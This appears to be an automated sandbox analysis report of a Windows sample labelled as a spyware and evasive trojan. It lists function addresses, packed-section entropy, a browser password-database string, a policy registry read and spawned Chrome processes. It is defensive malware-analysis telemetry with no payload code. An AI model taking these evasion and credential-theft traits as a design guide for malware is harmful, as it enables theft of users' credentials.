          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659BFFF0_2_0659BFFF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659FFF60_2_0659FFF6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CCFEC0_2_065CCFEC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BDFEC0_2_065BDFEC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AA7E30_2_065AA7E3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659E7870_2_0659E787
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D345F0_2_065D345F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CCC4B0_2_065CCC4B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A14410_2_065A1441
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AD4450_2_065AD445
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C5C430_2_065C5C43
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C647F0_2_065C647F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BA46F0_2_065BA46F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BF46D0_2_065BF46D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065ACC630_2_065ACC63
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D740B0_2_065D740B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B343F0_2_065B343F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A943D0_2_065A943D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A7C310_2_065A7C31
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CA4280_2_065CA428
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B8CCA0_2_065B8CCA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C1CCB0_2_065C1CCB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D84F80_2_065D84F8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065ABCF60_2_065ABCF6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B44E90_2_065B44E9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A84EE0_2_065A84EE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A9C910_2_065A9C91
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B8C8A0_2_065B8C8A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D3C8E0_2_065D3C8E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C94B80_2_065C94B8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D2CB80_2_065D2CB8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D1CBB0_2_065D1CBB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659ACAE0_2_0659ACAE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CF4A40_2_065CF4A4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A15570_2_065A1557
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D4D500_2_065D4D50
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A2D190_2_065A2D19
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659653B0_2_0659653B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CC5350_2_065CC535
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C2DDD0_2_065C2DDD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A6DDF0_2_065A6DDF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065995CA0_2_065995CA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BCDCF0_2_065BCDCF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C35C00_2_065C35C0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B0DEA0_2_065B0DEA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A05EF0_2_065A05EF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C25EA0_2_065C25EA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BD5EC0_2_065BD5EC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AE5E70_2_065AE5E7
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A75E50_2_065A75E5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065975980_2_06597598
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659858F0_2_0659858F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065ADD870_2_065ADD87
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B95AB0_2_065B95AB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659AA5C0_2_0659AA5C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06595A510_2_06595A51
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A6A480_2_065A6A48
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B9A480_2_065B9A48
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D0A740_2_065D0A74
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B22680_2_065B2268
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06597A630_2_06597A63
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659F21B0_2_0659F21B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B4A1C0_2_065B4A1C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BD2160_2_065BD216
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B620A0_2_065B620A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A720E0_2_065A720E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C9A3D0_2_065C9A3D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065962350_2_06596235
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C22290_2_065C2229
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AFA240_2_065AFA24
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BC2DB0_2_065BC2DB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D52DA0_2_065D52DA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D62CD0_2_065D62CD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A1AC80_2_065A1AC8
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BBAFB0_2_065BBAFB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B5AF60_2_065B5AF6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CAAEC0_2_065CAAEC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A3AEC0_2_065A3AEC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C3AE30_2_065C3AE3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B82BE0_2_065B82BE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659FAAB0_2_0659FAAB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06596AA20_2_06596AA2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C63560_2_065C6356
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C134A0_2_065C134A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CB3430_2_065CB343
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C737E0_2_065C737E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B1B180_2_065B1B18
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B630D0_2_065B630D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A833D0_2_065A833D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BEB300_2_065BEB30
          Source: file.exeBinary or memory string: OriginalFilename vs file.exe
          Source: file.exe, 00000000.00000003.1577651388.0000000006166000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574539252.000000000614C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568158000.0000000006037000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1565607141.00000000060DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566525580.00000000060E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571462588.000000000612C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571731969.0000000006034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1617795530.0000000005E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1560970650.0000000005EBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1697058781.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1618228731.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570214828.00000000061FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1576126514.0000000006280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568251309.00000000060F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566615851.0000000006033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1567970712.000000000603B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1576662746.000000000616B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569376104.00000000061DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1564230120.000000000603F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1576438377.0000000006038000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571004949.0000000006210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570446720.000000000611E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1579207319.0000000006036000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1572103237.0000000006241000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568539552.00000000060F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1563998237.0000000005C94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1577401606.0000000006032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574025944.000000000614B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566845073.0000000006035000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1578194183.00000000062A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574417957.0000000006034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566440259.0000000006041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1573522524.0000000006143000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1565780446.00000000060DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1573316447.000000000603C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569985801.0000000006034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1572705202.000000000614C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568064145.0000000006100000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571127446.000000000603A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571940150.000000000613B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1563910424.0000000005EBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1564304140.00000000060DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1567653980.00000000060F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1564151369.0000000005C9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1572931332.0000000006036000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1572226484.0000000006041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571227200.0000000006131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1560970650.0000000005E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1573165038.0000000006150000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1564076563.0000000006037000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574942471.000000000615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1572384385.000000000614B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574291206.0000000006151000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566355461.0000000006180000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1618284998.0000000005B9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.1572548442.000000000603F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.1724525013.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568347829.00000000061B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571344463.0000000006032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569505902.0000000006040000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1577791548.0000000006033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1577225881.00000000062AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1567873892.0000000006101000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1578345836.0000000006038000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1577942082.0000000006167000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1567553503.000000000603D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570771899.0000000006032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569635459.0000000006120000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.1727802292.0000000006586000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.1567445450.00000000061AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1565694842.0000000006040000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566105477.00000000060DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574795637.0000000006037000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566272596.00000000060D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566017355.000000000603B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1571588435.0000000006231000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1575569720.0000000006035000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568865641.0000000006111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568621518.00000000061CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1565937879.00000000060D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1577090403.000000000616D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570094726.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1575309825.000000000615D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1575843383.0000000006153000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1618123496.000000000139E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1575104869.0000000006036000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1567748408.000000000603D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.1727463677.00000000062D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1579392888.0000000006191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570328283.0000000006037000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1573727551.0000000006034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568443094.0000000006035000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1578674042.0000000006039000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1567065782.00000000060EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574165932.0000000006034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1576943015.000000000603A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1578493782.000000000617F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1565859175.0000000006034000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569064004.0000000006105000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1574662969.0000000006263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566708147.00000000060EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569863855.0000000006114000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1560970650.0000000005E76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.1568771267.0000000006032000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570652173.0000000006206000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1579038554.00000000062CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1570889832.0000000006117000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1569754316.0000000006041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1565522115.000000000603B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1566189143.0000000006038000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1568961854.0000000006039000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.1578878780.000000000617C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992635758196722
          Source: file.exeStatic PE information: Section: obdpnpls ZLIB complexity 0.9942487668247171
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/64@11/7
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exe, 00000000.00000003.1364973852.0000000005BA9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364725958.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1386962908.0000000005C40000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1386962908.0000000005BBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
          Source: file.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,4249164096274677999,9181346475388211576,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1916,i,2138066403308314358,10443051361612717293,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
